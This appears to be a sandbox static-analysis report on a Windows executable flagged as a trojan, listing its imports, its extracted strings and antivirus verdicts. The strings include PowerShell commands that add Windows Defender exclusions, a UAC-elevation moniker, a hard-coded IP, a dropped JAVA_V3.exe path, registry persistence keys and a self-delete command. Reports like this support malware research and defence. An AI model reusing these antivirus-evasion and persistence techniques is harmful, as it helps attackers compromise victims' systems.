Static | ZeroBOX

PE Compile Time

2024-10-17 23:46:51

PE Imphash

b3d8d380bba0cee3b72bee02e5aa3f89

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00001000       0x00015d4b    0x00015e00        6.63858487963
.rdata  0x00017000       0x00007202    0x00007400        5.12835680729
.data   0x0001f000       0x00001968    0x00000c00        2.02219702836
.rsrc   0x00021000       0x000001e0    0x00000200        4.71767883295
.reloc  0x00022000       0x000011f0    0x00001200        6.58506131363

Resources

Name         Offset      Size        Language      Sub-language        File type
RT_MANIFEST  0x00021060  0x0000017d  LANG_ENGLISH  SUBLANG_ENGLISH_US  XML 1.0 document text

Imports

Library KERNEL32.dll:
0x417028 CreateMutexW
0x41702c Sleep
0x417030 GetLastError
0x417034 HeapAlloc
0x417038 ExitProcess
0x41703c GetCurrentProcess
0x417040 CreateDirectoryW
0x417044 CopyFileW
0x41704c ReleaseMutex
0x417050 GetLocalTime
0x417058 SetPriorityClass
0x41705c GetShortPathNameW
0x417064 HeapFree
0x417068 WriteFile
0x41706c CreateFileW
0x417070 CreateThread
0x417074 WriteConsoleW
0x417078 CreateProcessW
0x41707c CloseHandle
0x417084 GetProcessHeap
0x417088 GetComputerNameExW
0x41708c GetLocaleInfoW
0x417090 GetModuleFileNameW
0x417094 WaitForSingleObject
0x41709c DecodePointer
0x4170a0 HeapReAlloc
0x4170a4 HeapSize
0x4170a8 GetConsoleMode
0x4170ac GetConsoleOutputCP
0x4170b0 FlushFileBuffers
0x4170b4 SetFilePointerEx
0x4170b8 GetFileSizeEx
0x4170bc GetStringTypeW
0x4170c0 SetStdHandle
0x4170cc WideCharToMultiByte
0x4170d0 MultiByteToWideChar
0x4170d4 GetCommandLineW
0x4170d8 GetCommandLineA
0x4170dc GetCPInfo
0x4170e0 GetOEMCP
0x4170e4 GetACP
0x4170e8 IsValidCodePage
0x4170ec FindNextFileW
0x4170f0 FindFirstFileExW
0x4170f4 FindClose
0x4170fc GetCurrentProcessId
0x417100 GetCurrentThreadId
0x417108 InitializeSListHead
0x41710c IsDebuggerPresent
0x417118 GetStartupInfoW
0x417120 GetModuleHandleW
0x417124 TerminateProcess
0x417128 LocalFree
0x41712c RaiseException
0x417130 RtlUnwind
0x417134 SetLastError
0x41713c EncodePointer
0x417144 TlsAlloc
0x417148 TlsGetValue
0x41714c TlsSetValue
0x417150 TlsFree
0x417154 FreeLibrary
0x417158 GetProcAddress
0x41715c LoadLibraryExW
0x417160 GetStdHandle
0x417164 GetModuleHandleExW
0x417168 GetFileType
0x41716c LCMapStringW
Library ADVAPI32.dll:
0x417000 RegCreateKeyExW
0x417004 RegSetValueExW
0x417008 RegCloseKey
0x41700c RegOpenKeyExW
0x417010 RegGetValueW
0x417014 OpenProcessToken
0x417018 GetTokenInformation
0x41701c GetUserNameW
Library SHELL32.dll:
0x417184 SHChangeNotify
0x417188 ShellExecuteExW
Library ole32.dll:
0x4171c4 CoInitializeEx
0x4171c8 CoInitialize
0x4171cc CoCreateInstance
0x4171d4 CoGetObject
0x4171d8 CoUninitialize
Library OLEAUT32.dll:
0x417174 VariantClear
0x417178 SysAllocString
0x41717c VariantInit
Library SHLWAPI.dll:
0x417190 PathStripPathW
Library WS2_32.dll:
0x417198 WSAStartup
0x41719c socket
0x4171a0 send
0x4171a4 recv
0x4171a8 closesocket
0x4171ac select
0x4171b0 connect
0x4171b4 shutdown
0x4171b8 WSAStringToAddressW
0x4171bc htons

Strings

!This program cannot be run in DOS mode.
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__swift_3
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
Unknown exception
bad exception
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
(null)
CorExitProcess
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
AreFileApisANSI
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
1#QNAN
1#SNAN
_hypot
_nextafter
Lksoei327fuajsp20
!= S_OKAY
GetSystemDefaultUILanguage
GetModuleFileNameW
GetLocaleInfoW
GetComputerNameExW
GetProcessHeap
ExpandEnvironmentStringsW
CloseHandle
CreateProcessW
EnterCriticalSection
LeaveCriticalSection
CreateMutexW
GetLastError
HeapAlloc
ExitProcess
GetCurrentProcess
CreateDirectoryW
CopyFileW
WaitForSingleObject
ReleaseMutex
GetLocalTime
SetProcessPriorityBoost
SetPriorityClass
GetShortPathNameW
GetEnvironmentVariableW
HeapFree
WriteFile
CreateFileW
CreateThread
KERNEL32.dll
GetTokenInformation
OpenProcessToken
RegGetValueW
RegOpenKeyExW
RegCloseKey
RegSetValueExW
RegCreateKeyExW
GetUserNameW
ADVAPI32.dll
SHChangeNotify
ShellExecuteExW
SHELL32.dll
CoUninitialize
CoInitializeEx
CoGetObject
CoInitialize
CoCreateInstance
CoInitializeSecurity
ole32.dll
OLEAUT32.dll
PathStripPathW
SHLWAPI.dll
WSAStringToAddressW
WS2_32.dll
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetStartupInfoW
IsProcessorFeaturePresent
GetModuleHandleW
TerminateProcess
LocalFree
RaiseException
RtlUnwind
SetLastError
DeleteCriticalSection
EncodePointer
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
GetProcAddress
LoadLibraryExW
GetStdHandle
GetModuleHandleExW
GetFileType
LCMapStringW
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
GetCommandLineA
GetCommandLineW
MultiByteToWideChar
WideCharToMultiByte
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetStdHandle
GetStringTypeW
GetFileSizeEx
SetFilePointerEx
FlushFileBuffers
GetConsoleOutputCP
GetConsoleMode
HeapSize
HeapReAlloc
DecodePointer
WriteConsoleW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AV_com_error@@
.?AVbad_exception@std@@
.?AVexception@std@@
.?AVtype_info@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Aapi-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
(null)
mscoree.dll
Aapi-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-4
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
kernelbase
api-ms-win-appmodel-runtime-l1-1-2
user32
api-ms-win-core-fibers-l1-1-0
ext-ms-
Aja-JP
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
64.94.85.117
%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Add-MpPreference -ExclusionPath "%ws"; Add-MpPreference -ExclusionProcess "%ws"; exit"
rundll32.exe
cmd.exe
powershell.exe "Add-MpPreference -ExclusionPath "%ws"; exit"
Elevation:Administrator!new:
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
feogvduvixnsjoxskocxa
C:\Windows\explorer.exe
%LOCALAPPDATA%
\sdkwifhsyaunfs
\JAVA_V3.exe
diohfe92fh8sja9fwjs
e32i8f9wj2dsu8dhjfsi
SOFTWARE\Microsoft\Cryptography
MachineGuid
Softina
2005-01-01T12:05:00
Java_V3
%WINDIR%\System32\rundll32.exe
rundll32 "%ws" d
%WINDIR%\System32\cmd.exe
%ws /c "%ws"
%02d.%02d.%02d
Software\Softina
COMSPEC
/c del
> nul
Antivirus             Signature
Bkav                  W32.AIDetectMalware
Lionic                Trojan.Win32.Generic.4!c
Elastic               malicious (high confidence)
ClamAV                Clean
CMC                   Clean
CAT-QuickHeal         Clean
Skyhigh               BehavesLike.Win32.NetLoader.ch
ALYac                 Clean
Cylance               Unsafe
Zillya                Clean
Sangfor               Clean
CrowdStrike           win/malicious_confidence_90% (D)
Alibaba               Clean
K7GW                  Clean
K7AntiVirus           Clean
huorong               Clean
Baidu                 Clean
VirIT                 Clean
Paloalto              generic.ml
Symantec              ML.Attribute.HighConfidence
tehtris               Clean
ESET-NOD32            Clean
APEX                  Malicious
Avast                 Clean
Cynet                 Malicious (score: 100)
Kaspersky             UDS:DangerousObject.Multi.Generic
BitDefender           Trojan.GenericKD.74343726
NANO-Antivirus        Clean
ViRobot               Clean
MicroWorld-eScan      Trojan.GenericKD.74343726
Tencent               Clean
Sophos                Clean
F-Secure              Clean
DrWeb                 Clean
VIPRE                 Clean
TrendMicro            Clean
McAfeeD               Real Protect-LS!1EC718ADA22E
Trapmine              suspicious.low.ml.score
CTX                   exe.trojan.generic
Emsisoft              Trojan.GenericKD.74343726 (B)
Ikarus                Clean
FireEye               Generic.mg.1ec718ada22e61a5
Jiangmin              Clean
Webroot               Clean
Varist                Clean
Avira                 Clean
Fortinet              W32/PossibleThreat
Antiy-AVL             Trojan/Win32.Agent
Kingsoft              Clean
Gridinsoft            Trojan.Win32.Gen.cl
Xcitium               Clean
Arcabit               Trojan.Generic.D46E652E
SUPERAntiSpyware      Clean
ZoneAlarm             Clean
Microsoft             Clean
Google                Clean
AhnLab-V3             Clean
Acronis               Clean
McAfee                Artemis!1EC718ADA22E
TACHYON               Clean
VBA32                 Clean
Malwarebytes          Generic.Malware/Suspicious
Panda                 Clean
Zoner                 Clean
TrendMicro-HouseCall  Clean
Rising                Clean
Yandex                Clean
SentinelOne           Static AI - Malicious PE
MaxSecure             Trojan.Malware.300983.susgen
GData                 Trojan.GenericKD.74343726
AVG                   Clean
DeepInstinct          MALICIOUS
alibabacloud          Trojan
No IRMA results available.